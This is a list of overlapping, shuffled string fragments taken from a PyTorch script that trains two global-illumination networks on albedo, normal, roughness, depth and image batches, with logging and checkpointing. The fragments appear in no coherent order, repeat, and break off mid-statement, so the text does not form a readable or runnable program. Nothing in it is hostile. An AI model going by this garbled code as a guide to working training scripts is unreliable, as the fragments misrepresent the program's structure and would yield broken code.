"= dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu =",
"param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList",
"g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch,",
"gpus used for training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the",
"3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination()",
").data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut",
"0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch",
"parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we use') opt =",
"imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global",
"depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of",
"np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for",
", '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment,",
"'{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for n in range(0, opt.cascadeLevel",
") ############## ###################### # Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId)",
"in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in",
"albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu",
"utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j == 1 or j",
"default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size')",
"n) ) trainingLog.close() # Update the training rate if (epoch + 1) %",
"(epoch + 1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /=",
"illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether",
"globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype",
"= 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25)",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch",
"assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment)",
"network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination",
"opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize,",
"j == 1 or j == 1000 or j% 2000 == 0: #",
"j == 1000 or j% 2000 == 0: # Save the ground truth",
"= globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum =",
"'{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training rate if (epoch +",
"param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment,",
"opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' %",
"models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId)",
"globalIllu2s = [] globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch,",
"dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch",
"help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network') #",
"opt.epochId) ) ) ############## ###################### # Send things into GPU if opt.cuda: albedoBatch",
"= sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step()",
"1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList =",
") depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu )",
"normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n],",
"height / width of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda')",
"2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3') # Fine",
"globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum",
").data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for n in",
"error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch,",
"opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1,",
"( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update",
"prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to",
"np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel],",
"0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset,",
"training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global",
"np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1,",
"opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"(0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6,",
"axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0),",
"num_workers = 8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel],",
"roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = []",
"1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8",
"3') # Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune",
"if (epoch + 1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr']",
"not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network') #",
"( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch",
"3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global",
"pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append( torch.sum(",
"( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch",
"1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) *",
"a CUDA device, so you should probably run with --cuda\") #################################### # initalize",
"inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2",
"1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data",
"Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5,",
"'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int, default = -1,",
"opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( (",
"import torch import numpy as np from torch.autograd import Variable import torch.optim as",
"models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ##############",
"renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch)",
"epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog,",
"/ torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image(",
"( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted",
"argparse import random import os import models import torchvision.utils as vutils import utils",
"# Update the training rate if (epoch + 1) % 2 == 0:",
"(0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment,",
"1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment,",
"network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId',",
"globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3",
"for n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch)",
"- imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] -",
") imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"[globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j)",
"data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu =",
"= [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0,",
"== 0: # Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch +",
"imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId)",
"imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 )",
"default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight",
"1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) )",
"or not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network')",
"as optim import argparse import random import os import models import torchvision.utils as",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )",
"[1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList",
"opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId)",
"ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) )",
"and models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of",
"from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The locationi of training set",
"imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture #",
"albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 =",
"[] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1)",
"lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### ####################################",
"brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers",
"/ pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch)",
"globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if",
"# Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data,",
"'{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch",
"= albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch =",
"vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save",
"= 8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype",
") opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot,",
"initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"'{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j)",
"8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype =",
"'{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j)",
"- imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0",
"== 0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) )",
"######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ######################",
"% opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed =",
"np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype =",
") vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) #",
").data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data,",
"action = 'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int, default",
"global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction",
"imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2",
"help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize',",
"epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch",
"= torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 )",
"= models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment,",
"albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId)",
"parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination'",
"epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :],",
"j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog,",
"samples and models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number",
"n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) *",
"of the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much",
"random import os import models import torchvision.utils as vutils import utils import dataLoader",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )",
"axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1,",
"with --cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize',",
"= g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output",
"globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for",
"utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)",
"np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch,",
"depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data ,",
"for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i,",
") / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] -",
"dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones(",
"input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch)",
"= open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j += 1 #",
"epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs,",
"1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch)",
"param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList",
"segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch,",
"globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype",
"epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0),",
"albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch",
"#################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 =",
"= dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu =",
"roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId)",
"3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch =",
"= np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1,",
"j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0),",
"+ 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j)",
"/= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch)",
"normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs =",
") os.system('cp *.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId",
